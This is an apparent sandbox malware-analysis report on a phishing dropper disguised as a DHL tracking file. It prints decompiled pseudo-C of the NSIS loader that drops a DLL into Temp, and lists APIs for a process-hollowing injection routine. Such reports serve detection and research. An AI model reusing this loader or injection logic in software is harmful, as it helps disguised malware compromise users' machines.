                    • Opcode ID: 1b836ab39891d0ed633b9e8fdaad556c57e04705e63d575667ba9658825fde44
                    • Instruction ID: 5423f1521edd6c22147bc7c07d225ef67cd2e9978b4dd0bca8e1ac87d1580d65
                    • Opcode Fuzzy Hash: 1b836ab39891d0ed633b9e8fdaad556c57e04705e63d575667ba9658825fde44
                    • Instruction Fuzzy Hash: 3A61C0B1644200BED6306F65AC45E3B3AADEB4474AF44457FF940B22E1C77DAD058A2E
                    Uniqueness

                    Uniqueness Score: -1.00%

                    Function 00402C5B Relevance: 26.5, APIs: 5, Strings: 10, Instructions: 203memoryCOMMON
                    Download Yara Rule

                    Control-flow Graph

                    • Executed
                    • Not Executed
                    control_flow_graph 177 402c5b-402ca9 GetTickCount GetModuleFileNameA call 40575c 180 402cb5-402ce3 call 405a85 call 4055bf call 405a85 GetFileSize 177->180 181 402cab-402cb0 177->181 189 402dd3-402de1 call 402bc5 180->189 190 402ce9-402d00 180->190 182 402efa-402efe 181->182 196 402eb2-402eb7 189->196 197 402de7-402dea 189->197 191 402d02 190->191 192 402d04-402d0a call 4031a8 190->192 191->192 198 402d0f-402d11 192->198 196->182 199 402e16-402e62 GlobalAlloc call 405e7d call 40578b CreateFileA 197->199 200 402dec-402dfd call 4031da call 4031a8 197->200 201 402d17-402d1d 198->201 202 402e6e-402e76 call 402bc5 198->202 227 402e64-402e69 199->227 228 402e78-402ea8 call 4031da call 402f01 199->228 220 402e02-402e04 200->220 205 402d9d-402da1 201->205 206 402d1f-402d37 call 40571d 201->206 202->196 209 402da3-402da9 call 402bc5 205->209 210 402daa-402db0 205->210 206->210 224 402d39-402d40 206->224 209->210 216 402db2-402dc0 call 405e0f 210->216 217 402dc3-402dcd 210->217 216->217 217->189 217->190 220->196 225 402e0a-402e10 220->225 224->210 229 402d42-402d49 224->229 225->196 225->199 227->182 237 402ead-402eb0 228->237 229->210 231 402d4b-402d52 229->231 231->210 233 402d54-402d5b 231->233 233->210 235 402d5d-402d7d 233->235 235->196 236 402d83-402d87 235->236 238 402d89-402d8d 236->238 239 402d8f-402d97 236->239 237->196 240 402eb9-402eca 237->240 238->189 238->239 239->210 241 402d99-402d9b 239->241 242 402ed2-402ed7 240->242 243 402ecc 240->243 241->210 244 402ed8-402ede 242->244 243->242 244->244 245 402ee0-402ef8 call 40571d 244->245 245->182
                    C-Code - Quality: 96%
                    			E00402C5B(void* __eflags, signed int _a4) {
				long _v8;
				long _v12;
				intOrPtr _v16;
				long _v20;
				intOrPtr _v24;
				intOrPtr _v28;
				intOrPtr _v32;
				intOrPtr _v36;
				signed int _v40;
				char _v300;
				signed int _t54;
				void* _t57;
				void* _t62;
				signed int _t63;
				intOrPtr _t65;
				void* _t68;
				intOrPtr* _t70;
				intOrPtr _t71;
				signed int _t77;
				signed int _t79;
				signed int _t82;
				signed int _t83;
				signed int _t89;
				intOrPtr _t92;
				signed int _t101;
				signed int _t103;
				void* _t105;
				signed int _t106;
				signed int _t109;
				void* _t110;

				_v8 = 0;
				_v12 = 0;
				 *0x423eac = GetTickCount() + 0x3e8;
				GetModuleFileNameA(0, "C:\\Users\\engineer\\Desktop\\DHL AWB TRACKING DETAILS.exe", 0x400);
				_t105 = E0040575C("C:\\Users\\engineer\\Desktop\\DHL AWB TRACKING DETAILS.exe", 0x80000000, 3);
				 *0x409010 = _t105;
				if(_t105 == 0xffffffff) {
					return "Error launching installer";
				}
				E00405A85("C:\\Users\\engineer\\Desktop", "C:\\Users\\engineer\\Desktop\\DHL AWB TRACKING DETAILS.exe");
				E00405A85(0x42b000, E004055BF("C:\\Users\\engineer\\Desktop"));
				_t54 = GetFileSize(_t105, 0);
				__eflags = _t54;
				 *0x41f048 = _t54;
				_t109 = _t54;
				if(_t54 <= 0) {
					L22:
					E00402BC5(1);
					__eflags =  *0x423eb4; // 0x7e00
					if(__eflags == 0) {
						goto L30;
					}
					__eflags = _v12;
					if(_v12 == 0) {
						L26:
						_t57 = GlobalAlloc(0x40, _v20); // executed
						_t110 = _t57;
						E00405E7D(0x40afb0);
						E0040578B( &_v300, "C:\\Users\\engineer\\AppData\\Local\\Temp\\"); // executed
						_t62 = CreateFileA( &_v300, 0xc0000000, 0, 0, 2, 0x4000100, 0); // executed
						__eflags = _t62 - 0xffffffff;
						 *0x409014 = _t62;
						if(_t62 != 0xffffffff) {
							_t63 =  *0x423eb4; // 0x7e00
							_t65 = E004031DA(_t63 + 0x1c);
							 *0x41f04c = _t65;
							 *0x417040 = _t65 - ( !_v40 & 0x00000004) + _v16 - 0x1c; // executed
							_t68 = E00402F01(_v16, 0xffffffff, 0, _t110, _v20); // executed
							__eflags = _t68 - _v20;
							if(_t68 == _v20) {
								__eflags = _v40 & 0x00000001;
								 *0x423eb0 = _t110;
								 *0x423eb8 =  *_t110;
								if((_v40 & 0x00000001) != 0) {
									 *0x423ebc =  *0x423ebc + 1;
									__eflags =  *0x423ebc;
								}
								_t45 = _t110 + 0x44; // 0x44
								_t70 = _t45;
								_t101 = 8;
								do {
									_t70 = _t70 - 8;
									 *_t70 =  *_t70 + _t110;
									_t101 = _t101 - 1;
									__eflags = _t101;
								} while (_t101 != 0);
								_t71 =  *0x41703c; // 0x41a9c
								 *((intOrPtr*)(_t110 + 0x3c)) = _t71;
								E0040571D(0x423ec0, _t110 + 4, 0x40);
								__eflags = 0;
								return 0;
							}
							goto L30;
						}
						return "Error writing temporary file. Make sure your temp folder is valid.";
					}
					E004031DA( *0x417038);
					_t77 = E004031A8( &_a4, 4); // executed
					__eflags = _t77;
					if(_t77 == 0) {
						goto L30;
					}
					__eflags = _v8 - _a4;
					if(_v8 != _a4) {
						goto L30;
					}
					goto L26;
				} else {
					do {
						_t79 =  *0x423eb4; // 0x7e00
						_t106 = _t109;
						asm("sbb eax, eax");
						_t82 = ( ~_t79 & 0x00007e00) + 0x200;
						__eflags = _t109 - _t82;
						if(_t109 >= _t82) {
							_t106 = _t82;
						}
						_t83 = E004031A8(0x417048, _t106); // executed
						__eflags = _t83;
						if(_t83 == 0) {
							E00402BC5(1);
							L30:
							return "Installer integrity check has failed. Common causes include\nincomplete download and damaged media. Contact the\ninstaller\'s author to obtain a new copy.\n\nMore information at:\nhttp://nsis.sf.net/NSIS_Error";
						}
						__eflags =  *0x423eb4; // 0x7e00
						if(__eflags != 0) {
							__eflags = _a4 & 0x00000002;
							if((_a4 & 0x00000002) == 0) {
								E00402BC5(0);
							}
							goto L19;
						}
						E0040571D( &_v40, 0x417048, 0x1c);
						_t89 = _v40;
						__eflags = _t89 & 0xfffffff0;
						if((_t89 & 0xfffffff0) != 0) {
							goto L19;
						}
						__eflags = _v36 - 0xdeadbeef;
						if(_v36 != 0xdeadbeef) {
							goto L19;
						}
						__eflags = _v24 - 0x74736e49;
						if(_v24 != 0x74736e49) {
							goto L19;
						}
						__eflags = _v28 - 0x74666f73;
						if(_v28 != 0x74666f73) {
							goto L19;
						}
						__eflags = _v32 - 0x6c6c754e;
						if(_v32 != 0x6c6c754e) {
							goto L19;
						}
						_a4 = _a4 | _t89;
						_t103 =  *0x417038; // 0x0
						 *0x423f40 =  *0x423f40 | _a4 & 0x00000002;
						_t92 = _v16;
						__eflags = _t92 - _t109;
						 *0x423eb4 = _t103;
						if(_t92 > _t109) {
							goto L30;
						}
						__eflags = _a4 & 0x00000008;
						if((_a4 & 0x00000008) != 0) {
							L15:
							_v12 = _v12 + 1;
							_t109 = _t92 - 4;
							__eflags = _t106 - _t109;
							if(_t106 > _t109) {
								_t106 = _t109;
							}
							goto L19;
						}
						__eflags = _a4 & 0x00000004;
						if((_a4 & 0x00000004) != 0) {
							goto L22;
						}
						goto L15;
						L19:
						__eflags = _t109 -  *0x41f048; // 0x4081
						if(__eflags < 0) {
							_v8 = E00405E0F(_v8, 0x417048, _t106);
						}
						 *0x417038 =  *0x417038 + _t106;
						_t109 = _t109 - _t106;
						__eflags = _t109;
					} while (_t109 > 0);
					goto L22;
				}
			}

































                    0x00402c69
                    0x00402c6c
                    0x00402c86
                    0x00402c8b
                    0x00402c9e
                    0x00402ca3
                    0x00402ca9
                    0x00000000
                    0x00402cab
                    0x00402cbc
                    0x00402ccd
                    0x00402cd4
                    0x00402cda
                    0x00402cdc
                    0x00402ce1
                    0x00402ce3
                    0x00402dd3
                    0x00402dd5
                    0x00402dda
                    0x00402de1
                    0x00000000
                    0x00000000
                    0x00402de7
                    0x00402dea
                    0x00402e16
                    0x00402e1b
                    0x00402e26
                    0x00402e28
                    0x00402e39
                    0x00402e54
                    0x00402e5a
                    0x00402e5d
                    0x00402e62
                    0x00402e78
                    0x00402e81
                    0x00402e91
                    0x00402ea3
                    0x00402ea8
                    0x00402ead
                    0x00402eb0
                    0x00402eb9
                    0x00402ebd
                    0x00402ec5
                    0x00402eca
                    0x00402ecc
                    0x00402ecc
                    0x00402ecc
                    0x00402ed4
                    0x00402ed4
                    0x00402ed7
                    0x00402ed8
                    0x00402ed8
                    0x00402edb
                    0x00402edd
                    0x00402edd
                    0x00402edd
                    0x00402ee0
                    0x00402ee7
                    0x00402ef3
                    0x00402ef8
                    0x00000000
                    0x00402ef8
                    0x00000000
                    0x00402eb0
                    0x00000000
                    0x00402e64
                    0x00402df2
                    0x00402dfd
                    0x00402e02
                    0x00402e04
                    0x00000000
                    0x00000000
                    0x00402e0d
                    0x00402e10
                    0x00000000
                    0x00000000
                    0x00000000
                    0x00402ce9
                    0x00402ce9
                    0x00402ce9
                    0x00402cee
                    0x00402cf2
                    0x00402cf9
                    0x00402cfe
                    0x00402d00
                    0x00402d02
                    0x00402d02
                    0x00402d0a
                    0x00402d0f
                    0x00402d11
                    0x00402e70
                    0x00402eb2
                    0x00000000
                    0x00402eb2
                    0x00402d17
                    0x00402d1d
                    0x00402d9d
                    0x00402da1
                    0x00402da4
                    0x00402da9
                    0x00000000
                    0x00402da1
                    0x00402d2a
                    0x00402d2f
                    0x00402d32
                    0x00402d37
                    0x00000000
                    0x00000000
                    0x00402d39
                    0x00402d40
                    0x00000000
                    0x00000000
                    0x00402d42
                    0x00402d49
                    0x00000000
                    0x00000000
                    0x00402d4b
                    0x00402d52
                    0x00000000
                    0x00000000
                    0x00402d54
                    0x00402d5b
                    0x00000000
                    0x00000000
                    0x00402d5d
                    0x00402d63
                    0x00402d6c
                    0x00402d72
                    0x00402d75
                    0x00402d77
                    0x00402d7d
                    0x00000000
                    0x00000000
                    0x00402d83
                    0x00402d87
                    0x00402d8f
                    0x00402d8f
                    0x00402d92
                    0x00402d95
                    0x00402d97
                    0x00402d99
                    0x00402d99
                    0x00000000
                    0x00402d97
                    0x00402d89
                    0x00402d8d
                    0x00000000
                    0x00000000
                    0x00000000
                    0x00402daa
                    0x00402daa
                    0x00402db0
                    0x00402dc0
                    0x00402dc0
                    0x00402dc3
                    0x00402dc9
                    0x00402dcb
                    0x00402dcb
                    0x00000000
                    0x00402ce9

                    APIs
                    • GetTickCount.KERNEL32 ref: 00402C6F
                    • GetModuleFileNameA.KERNEL32(00000000,C:\Users\user\Desktop\DHL AWB TRACKING DETAILS.exe,00000400), ref: 00402C8B
                      • Part of subcall function 0040575C: GetFileAttributesA.KERNELBASE(00000003,00402C9E,C:\Users\user\Desktop\DHL AWB TRACKING DETAILS.exe,80000000,00000003), ref: 00405760
                      • Part of subcall function 0040575C: CreateFileA.KERNELBASE(?,?,00000001,00000000,?,00000001,00000000), ref: 00405782
                    • GetFileSize.KERNEL32(00000000,00000000,0042B000,00000000,C:\Users\user\Desktop,C:\Users\user\Desktop,C:\Users\user\Desktop\DHL AWB TRACKING DETAILS.exe,C:\Users\user\Desktop\DHL AWB TRACKING DETAILS.exe,80000000,00000003), ref: 00402CD4
                    • GlobalAlloc.KERNELBASE(00000040,00409128), ref: 00402E1B
                    Strings
                    • Error launching installer, xrefs: 00402CAB
                    • "C:\Users\user\Desktop\DHL AWB TRACKING DETAILS.exe" , xrefs: 00402C68
                    • C:\Users\user\Desktop, xrefs: 00402CB6, 00402CBB, 00402CC1
                    • Installer integrity check has failed. Common causes includeincomplete download and damaged media. Contact theinstaller's author to obtain a new copy.More information at:http://nsis.sf.net/NSIS_Error, xrefs: 00402EB2
                    • C:\Users\user\AppData\Local\Temp\, xrefs: 00402C5B, 00402E33
                    • soft, xrefs: 00402D4B
                    • Error writing temporary file. Make sure your temp folder is valid., xrefs: 00402E64
                    • Null, xrefs: 00402D54
                    • Inst, xrefs: 00402D42
                    • C:\Users\user\Desktop\DHL AWB TRACKING DETAILS.exe, xrefs: 00402C75, 00402C84, 00402C98, 00402CB5
                    Memory Dump Source
                    • Source File: 00000000.00000002.361500476.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                    • Associated: 00000000.00000002.361468689.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.361533933.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.361550279.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.361628614.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.361653485.0000000000429000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.361679445.000000000042C000.00000002.00000001.01000000.00000003.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_400000_DHL AWB TRACKING DETAILS.jbxd
                    Similarity
                    • API ID: File$AllocAttributesCountCreateGlobalModuleNameSizeTick
                    • String ID: "C:\Users\user\Desktop\DHL AWB TRACKING DETAILS.exe" $C:\Users\user\AppData\Local\Temp\$C:\Users\user\Desktop$C:\Users\user\Desktop\DHL AWB TRACKING DETAILS.exe$Error launching installer$Error writing temporary file. Make sure your temp folder is valid.$Inst$Installer integrity check has failed. Common causes includeincomplete download and damaged media. Contact theinstaller's author to obtain a new copy.More information at:http://nsis.sf.net/NSIS_Error$Null$soft
                    • API String ID: 2803837635-553060449
                    • Opcode ID: 23dbf256a431c673dcec6fcfeb39f26d17845bcd57e0c5f68381439a59f6d1b4
                    • Instruction ID: 3eb6007c32f8468fb795c2e80af6b0be0f5756db52a0f0690052116b0cd8de19
                    • Opcode Fuzzy Hash: 23dbf256a431c673dcec6fcfeb39f26d17845bcd57e0c5f68381439a59f6d1b4
                    • Instruction Fuzzy Hash: 5B61E231A40204ABDB219F64DE89B9A7BB8AF04315F10417BF905B72D1D7BC9E858B9C
                    Uniqueness

                    Uniqueness Score: -1.00%

                    Function 00401734 Relevance: 15.9, APIs: 5, Strings: 4, Instructions: 147stringtimeCOMMON
                    Download Yara Rule

                    Control-flow Graph

                    • Executed
                    • Not Executed
                    control_flow_graph 317 401734-401757 call 4029e8 call 4055e5 322 401761-401773 call 405a85 call 405578 lstrcatA 317->322 323 401759-40175f call 405a85 317->323 329 401778-40177e call 405ce3 322->329 323->329 333 401783-401787 329->333 334 401789-401793 call 405d7c 333->334 335 4017ba-4017bd 333->335 343 4017a5-4017b7 334->343 344 401795-4017a3 CompareFileTime 334->344 337 4017c5-4017e1 call 40575c 335->337 338 4017bf-4017c0 call 40573d 335->338 345 4017e3-4017e6 337->345 346 401859-401882 call 404e23 call 402f01 337->346 338->337 343->335 344->343 347 4017e8-40182a call 405a85 * 2 call 405aa7 call 405a85 call 405346 345->347 348 40183b-401845 call 404e23 345->348 360 401884-401888 346->360 361 40188a-401896 SetFileTime 346->361 347->333 381 401830-401831 347->381 358 40184e-401854 348->358 362 402886 358->362 360->361 364 40189c-4018a7 FindCloseChangeNotification 360->364 361->364 365 402888-40288c 362->365 367 40287d-402880 364->367 368 4018ad-4018b0 364->368 367->362 369 4018b2-4018c3 call 405aa7 lstrcatA 368->369 370 4018c5-4018c8 call 405aa7 368->370 376 4018cd-402205 call 405346 369->376 370->376 376->365 384 40264e-402655 376->384 381->358 382 401833-401834 381->382 382->348 384->367
                    C-Code - Quality: 75%
                    			E00401734(FILETIME* __ebx, void* __eflags) {
				void* _t33;
				void* _t41;
				void* _t43;
				FILETIME* _t49;
				FILETIME* _t62;
				void* _t64;
				signed int _t70;
				FILETIME* _t71;
				FILETIME* _t75;
				signed int _t77;
				void* _t80;
				CHAR* _t82;
				void* _t85;

				_t75 = __ebx;
				_t82 = E004029E8(0x31);
				 *(_t85 - 8) = _t82;
				 *(_t85 + 8) =  *(_t85 - 0x24) & 0x00000007;
				_t33 = E004055E5(_t82);
				_push(_t82);
				if(_t33 == 0) {
					lstrcatA(E00405578(E00405A85(0x409b68, "C:\\Users\\engineer\\AppData\\Local\\Temp")), ??);
				} else {
					_push(0x409b68);
					E00405A85();
				}
				E00405CE3(0x409b68);
				while(1) {
					__eflags =  *(_t85 + 8) - 3;
					if( *(_t85 + 8) >= 3) {
						_t64 = E00405D7C(0x409b68);
						_t77 = 0;
						__eflags = _t64 - _t75;
						if(_t64 != _t75) {
							_t71 = _t64 + 0x14;
							__eflags = _t71;
							_t77 = CompareFileTime(_t71, _t85 - 0x18);
						}
						asm("sbb eax, eax");
						_t70 =  ~(( *(_t85 + 8) + 0xfffffffd | 0x80000000) & _t77) + 1;
						__eflags = _t70;
						 *(_t85 + 8) = _t70;
					}
					__eflags =  *(_t85 + 8) - _t75;
					if( *(_t85 + 8) == _t75) {
						E0040573D(0x409b68);
					}
					__eflags =  *(_t85 + 8) - 1;
					_t41 = E0040575C(0x409b68, 0x40000000, (0 |  *(_t85 + 8) != 0x00000001) + 1);
					__eflags = _t41 - 0xffffffff;
					 *(_t85 - 0x34) = _t41;
					if(_t41 != 0xffffffff) {
						break;
					}
					__eflags =  *(_t85 + 8) - _t75;
					if( *(_t85 + 8) != _t75) {
						E00404E23(0xffffffe2,  *(_t85 - 8));
						__eflags =  *(_t85 + 8) - 2;
						if(__eflags == 0) {
							 *((intOrPtr*)(_t85 - 4)) = 1;
						}
						L31:
						 *0x423f28 =  *0x423f28 +  *((intOrPtr*)(_t85 - 4));
						__eflags =  *0x423f28;
						goto L32;
					} else {
						E00405A85(0x40a368, 0x424000);
						E00405A85(0x424000, 0x409b68);
						E00405AA7(_t75, 0x40a368, 0x409b68, "C:\Users\engineer\AppData\Local\Temp\nsr8F1B.tmp\vzhghptrhu.dll",  *((intOrPtr*)(_t85 - 0x10)));
						E00405A85(0x424000, 0x40a368);
						_t62 = E00405346("C:\Users\engineer\AppData\Local\Temp\nsr8F1B.tmp\vzhghptrhu.dll",  *(_t85 - 0x24) >> 3) - 4;
						__eflags = _t62;
						if(_t62 == 0) {
							continue;
						} else {
							__eflags = _t62 == 1;
							if(_t62 == 1) {
								 *0x423f28 =  &( *0x423f28->dwLowDateTime);
								L32:
								_t49 = 0;
								__eflags = 0;
							} else {
								_push(0x409b68);
								_push(0xfffffffa);
								E00404E23();
								L29:
								_t49 = 0x7fffffff;
							}
						}
					}
					L33:
					return _t49;
				}
				E00404E23(0xffffffea,  *(_t85 - 8));
				 *0x423f54 =  *0x423f54 + 1;
				_t43 = E00402F01(_t77,  *((intOrPtr*)(_t85 - 0x1c)),  *(_t85 - 0x34), _t75, _t75); // executed
				 *0x423f54 =  *0x423f54 - 1;
				__eflags =  *(_t85 - 0x18) - 0xffffffff;
				_t80 = _t43;
				if( *(_t85 - 0x18) != 0xffffffff) {
					L22:
					SetFileTime( *(_t85 - 0x34), _t85 - 0x18, _t75, _t85 - 0x18); // executed
				} else {
					__eflags =  *((intOrPtr*)(_t85 - 0x14)) - 0xffffffff;
					if( *((intOrPtr*)(_t85 - 0x14)) != 0xffffffff) {
						goto L22;
					}
				}
				FindCloseChangeNotification( *(_t85 - 0x34)); // executed
				__eflags = _t80 - _t75;
				if(_t80 >= _t75) {
					goto L31;
				} else {
					__eflags = _t80 - 0xfffffffe;
					if(_t80 != 0xfffffffe) {
						E00405AA7(_t75, _t80, 0x409b68, 0x409b68, 0xffffffee);
					} else {
						E00405AA7(_t75, _t80, 0x409b68, 0x409b68, 0xffffffe9);
						lstrcatA(0x409b68,  *(_t85 - 8));
					}
					_push(0x200010);
					_push(0x409b68);
					E00405346();
					goto L29;
				}
				goto L33;
			}
















                    0x00401734
                    0x0040173b
                    0x00401744
                    0x00401747
                    0x0040174a
                    0x0040174f
                    0x00401757
                    0x00401773
                    0x00401759
                    0x00401759
                    0x0040175a
                    0x0040175a
                    0x00401779
                    0x00401783
                    0x00401783
                    0x00401787
                    0x0040178a
                    0x0040178f
                    0x00401791
                    0x00401793
                    0x00401798
                    0x00401798
                    0x004017a3
                    0x004017a3
                    0x004017b4
                    0x004017b6
                    0x004017b6
                    0x004017b7
                    0x004017b7
                    0x004017ba
                    0x004017bd
                    0x004017c0
                    0x004017c0
                    0x004017c7
                    0x004017d6
                    0x004017db
                    0x004017de
                    0x004017e1
                    0x00000000
                    0x00000000
                    0x004017e3
                    0x004017e6
                    0x00401840
                    0x00401845
                    0x004015a8
                    0x0040264e
                    0x0040264e
                    0x0040287d
                    0x00402880
                    0x00402880
                    0x00000000
                    0x004017e8
                    0x004017ee
                    0x004017f9
                    0x00401806
                    0x00401811
                    0x00401827
                    0x00401827
                    0x0040182a
                    0x00000000
                    0x00401830
                    0x00401830
                    0x00401831
                    0x0040184e
                    0x00402886
                    0x00402886
                    0x00402886
                    0x00401833
                    0x00401833
                    0x00401834
                    0x00401492
                    0x00402200
                    0x00402200
                    0x00402200
                    0x00401831
                    0x0040182a
                    0x00402888
                    0x0040288c
                    0x0040288c
                    0x0040185e
                    0x00401863
                    0x00401871
                    0x00401876
                    0x0040187c
                    0x00401880
                    0x00401882
                    0x0040188a
                    0x00401896
                    0x00401884
                    0x00401884
                    0x00401888
                    0x00000000
                    0x00000000
                    0x00401888
                    0x0040189f
                    0x004018a5
                    0x004018a7
                    0x00000000
                    0x004018ad
                    0x004018ad
                    0x004018b0
                    0x004018c8
                    0x004018b2
                    0x004018b5
                    0x004018be
                    0x004018be
                    0x004018cd
                    0x004018d2
                    0x004021fb
                    0x00000000
                    0x004021fb
                    0x00000000

                    APIs
                    • lstrcatA.KERNEL32(00000000,00000000,gdsanv,C:\Users\user\AppData\Local\Temp,00000000,00000000,00000031), ref: 00401773
                    • CompareFileTime.KERNEL32(-00000014,?,gdsanv,gdsanv,00000000,00000000,gdsanv,C:\Users\user\AppData\Local\Temp,00000000,00000000,00000031), ref: 0040179D
                      • Part of subcall function 00405A85: lstrcpynA.KERNEL32(?,?,00000400,00403293,nkdpnsqeoocyepqnevm Setup,NSIS Error), ref: 00405A92
                      • Part of subcall function 00404E23: lstrlenA.KERNEL32(0041FC70,00000000,00000000,00000000,?,?,?,?,?,?,?,?,?,00402C3C,00000000,?), ref: 00404E5C
                      • Part of subcall function 00404E23: lstrlenA.KERNEL32(00402C3C,0041FC70,00000000,00000000,00000000,?,?,?,?,?,?,?,?,?,00402C3C,00000000), ref: 00404E6C
                      • Part of subcall function 00404E23: lstrcatA.KERNEL32(0041FC70,00402C3C,00402C3C,0041FC70,00000000,00000000,00000000), ref: 00404E7F
                      • Part of subcall function 00404E23: SetWindowTextA.USER32(0041FC70,0041FC70), ref: 00404E91
                      • Part of subcall function 00404E23: SendMessageA.USER32(?,00001004,00000000,00000000), ref: 00404EB7
                      • Part of subcall function 00404E23: SendMessageA.USER32(?,00001007,00000000,00000001), ref: 00404ED1
                      • Part of subcall function 00404E23: SendMessageA.USER32(?,00001013,?,00000000), ref: 00404EDF
                    Strings
                    Memory Dump Source
                    • Source File: 00000000.00000002.361500476.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                    • Associated: 00000000.00000002.361468689.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.361533933.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.361550279.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.361628614.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.361653485.0000000000429000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.361679445.000000000042C000.00000002.00000001.01000000.00000003.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_400000_DHL AWB TRACKING DETAILS.jbxd
                    Similarity
                    • API ID: MessageSend$lstrcatlstrlen$CompareFileTextTimeWindowlstrcpyn
                    • String ID: C:\Users\user\AppData\Local\Temp$C:\Users\user\AppData\Local\Temp\nsr8F1B.tmp$C:\Users\user\AppData\Local\Temp\nsr8F1B.tmp\vzhghptrhu.dll$gdsanv
                    • API String ID: 1941528284-3335788617
                    • Opcode ID: ba0b5d2c7ef09039fa2985dd5c3eead3d8f39d7c1153f1f4a7a5f687554637de
                    • Instruction ID: c3a7f6530b99602e8ac3371ca3d410005e8cb954db153f1edc9c693d5e31c606
                    • Opcode Fuzzy Hash: ba0b5d2c7ef09039fa2985dd5c3eead3d8f39d7c1153f1f4a7a5f687554637de
                    • Instruction Fuzzy Hash: 4541AD31A00515BACB10BBB5DD86DAF3679EF45369B20433BF511B20E1D77C8A418EAE
                    Uniqueness

                    Uniqueness Score: -1.00%

                    Function 023811BB Relevance: 10.7, APIs: 5, Strings: 1, Instructions: 237processthreadCOMMON
                    Download Yara Rule

                    Control-flow Graph

                    • Executed
                    • Not Executed
                    control_flow_graph 385 23811bb-2381269 call 23806c7 call 2380776 * 7 402 238126c-2381270 385->402 403 2381288-2381295 402->403 404 2381272-2381286 402->404 405 2381298-238129c 403->405 404->402 406 238129e-23812b2 405->406 407 23812b4-23812d0 405->407 406->405 409 23812da-2381304 CreateProcessW 407->409 410 23812d2-23812d5 407->410 413 238130e-2381327 GetThreadContext 409->413 414 2381306-2381309 409->414 411 238147d-2381480 410->411 415 2381329-238132c 413->415 416 2381331-238134b ReadProcessMemory 413->416 414->411 415->411 417 238134d-2381350 416->417 418 2381355-238135e 416->418 417->411 419 2381388-23813a8 VirtualAllocEx 418->419 420 2381360-238136f 418->420 422 23813aa-23813ad 419->422 423 23813b2-23813ca call 2380267 419->423 420->419 421 2381371-2381377 call 2380368 420->421 426 238137c-238137e 421->426 422->411 429 23813cc-23813cf 423->429 430 23813d4-23813d8 423->430 426->419 428 2381380-2381383 426->428 428->411 429->411 431 23813e1-23813eb 430->431 432 23813ed-238141b call 2380267 431->432 433 2381422-238143e call 2380267 431->433 436 2381420 432->436 439 2381440-2381443 433->439 440 2381445-2381463 SetThreadContext 433->440 436->431 439->411 441 238146a-238146d call 23801b6 440->441 442 2381465-2381468 440->442 444 2381472-2381474 441->444 442->411 445 238147b 444->445 446 2381476-2381479 444->446 445->411 446->411
                    APIs
                    • CreateProcessW.KERNELBASE(?,00000000), ref: 023812FF
                    • GetThreadContext.KERNELBASE(?,00010007), ref: 02381322
                    Strings
                    Memory Dump Source
                    • Source File: 00000000.00000002.362270592.0000000002380000.00000040.00000800.00020000.00000000.sdmp, Offset: 02380000, based on PE: false
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_2380000_DHL AWB TRACKING DETAILS.jbxd
                    Similarity
                    • API ID: ContextCreateProcessThread
                    • String ID: D
                    • API String ID: 2843130473-2746444292
                    • Opcode ID: d2456bc59d1b2e60673a28ec1d3b8f16685ec7ebdf11fcffbf0185f5de6b3b31
                    • Instruction ID: 5d7d434765d399b162032b945882c76d53c74a6255578f162c1e77fe997975f9
                    • Opcode Fuzzy Hash: d2456bc59d1b2e60673a28ec1d3b8f16685ec7ebdf11fcffbf0185f5de6b3b31
                    • Instruction Fuzzy Hash: E3A1F571E10209EFDF54EFA4C980BAEBBB9EF08345F1044A5E559EB250D771AA42CF10
                    Uniqueness

                    Uniqueness Score: -1.00%

                    Function 00402F01 Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 109fileCOMMON
                    Download Yara Rule

                    Control-flow Graph

                    • Executed
                    • Not Executed
                    control_flow_graph 497 402f01-402f10 498 402f12-402f28 SetFilePointer 497->498 499 402f2e-402f39 call 40302c 497->499 498->499 502 403025-403029 499->502 503 402f3f-402f59 ReadFile 499->503 504 403022 503->504 505 402f5f-402f62 503->505 507 403024 504->507 505->504 506 402f68-402f7b call 40302c 505->506 506->502 510 402f81-402f84 506->510 507->502 511 402ff1-402ff7 510->511 512 402f86-402f89 510->512 513 402ff9 511->513 514 402ffc-40300f ReadFile 511->514 515 40301d-403020 512->515 516 402f8f 512->516 513->514 514->504 517 403011-40301a 514->517 515->502 518 402f94-402f9c 516->518 517->515 519 402fa1-402fb3 ReadFile 518->519 520 402f9e 518->520 519->504 521 402fb5-402fb8 519->521 520->519 521->504 522 402fba-402fcf WriteFile 521->522 523 402fd1-402fd4 522->523 524 402fed-402fef 522->524 523->524 525 402fd6-402fe9 523->525 524->507 525->518 526 402feb 525->526 526->515
                    C-Code - Quality: 93%
                    			E00402F01(void* __ecx, void _a4, void* _a8, void* _a12, long _a16) {
				long _v8;
				intOrPtr _v12;
				void _t31;
				intOrPtr _t32;
				int _t35;
				long _t36;
				int _t37;
				long _t38;
				int _t40;
				int _t42;
				long _t43;
				long _t44;
				intOrPtr _t51;
				long _t55;
				long _t57;

				_t31 = _a4;
				if(_t31 >= 0) {
					_t51 =  *0x423ef8; // 0x7161
					_t44 = _t31 + _t51;
					 *0x41703c = _t44;
					SetFilePointer( *0x409014, _t44, 0, 0); // executed
				}
				_t57 = 4;
				_t32 = E0040302C(_t57);
				if(_t32 >= 0) {
					_t35 = ReadFile( *0x409014,  &_a4, _t57,  &_v8, 0); // executed
					if(_t35 == 0 || _v8 != _t57) {
						L23:
						_push(0xfffffffd);
						goto L24;
					} else {
						 *0x41703c =  *0x41703c + _t57;
						_t32 = E0040302C(_a4);
